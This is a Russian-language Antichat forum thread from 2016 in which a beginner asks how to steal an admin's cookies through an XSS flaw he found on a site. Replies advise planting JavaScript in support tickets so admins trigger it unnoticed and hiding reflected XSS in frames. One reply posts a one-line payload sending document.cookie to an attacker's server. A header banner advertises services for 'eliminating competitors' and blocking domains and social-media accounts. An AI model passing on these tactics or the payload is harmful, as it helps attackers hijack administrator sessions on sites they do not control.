УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
как достать куки админа ? (xss)

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

27.04.2016, 20:54

ClayFox

Guest

Сообщений: n/a

Провел на форуме:
2822

Репутация: 0

всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.

заранее спасибо

27.04.2016, 21:16

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).

Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.

27.04.2016, 21:27

ClayFox

Guest

Сообщений: n/a

Провел на форуме:
2822

Репутация: 0

Цитата:

Сообщение от st55

st55 said:
↑
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.

a как понять XSS активная или пассивная ?

27.04.2016, 21:39

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от st55

активные и пассивные? ты уверен?

27.04.2016, 21:45

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
активные и пассивные? ты уверен?

наверно он не про xss

на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики

https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг

может прочтут

"если можно скиньте ссылку на видео или хорошую статью про xss."

блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"

то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц

27.04.2016, 23:59

Zen1T21

Guest

Сообщений: n/a

Провел на форуме:
51991

Репутация: 2

Если в GET:

document.location=('http://ip/xss.php?' + document.cookie);

Если в POST:

забить

28.04.2016, 02:08

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Zen1T21

Zen1T21 said:
↑
Если в GET:
document.location=('
http://ip/xss.php?
' + document.cookie);
Если в POST:
забить

да ну? иногда лучше жевать

28.04.2016, 06:14

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от st55

st55 said:
↑
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом

Никто так не делает. Пассивки во фреймах прячутся.

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
активные и пассивные? ты уверен?

Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.

Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.